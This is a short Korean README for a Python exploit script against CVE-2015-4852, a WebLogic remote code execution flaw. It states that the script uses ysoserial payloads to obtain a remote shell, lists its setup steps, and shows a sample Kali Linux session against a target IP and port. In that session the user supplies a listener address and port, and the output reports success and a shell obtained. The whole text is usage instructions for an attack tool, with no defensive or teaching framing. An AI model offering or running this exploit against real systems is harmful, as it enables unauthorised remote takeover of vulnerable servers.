
CVE-2015-4852 (WebLogic RCE)에 대한 Python 익스플로잇 스크립트로, ysoserial 페이로드를 사용하여 취약한 WebLogic 서버에서 원격 셸 접근을 달성합니다.
전제: ysoserial.jar를 스크립트 디렉터리 아래에 배치해야 합니다(ysoserial-0*.jar를 ysoserial.jar로 이름 변경). kali linux에서 스크립트를 실행하는 것이 좋습니다.
root@kali:~# python3 CVE-2015-4852.py -h
Usage: python CVE-2015-4852.py -t/--target 1.1.1.1 7001
Options:
-h, --help show this help message and exit
-t TARGET, --target=TARGET ip port
root@kali:~# python3 CVE-2015-4852.py -t 10.6.214.129 7001
리스닝 IP 주소를 입력하세요: 10.6.214.1
리스닝 포트를 입력하세요: 7777
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
실행 성공
쉘 획득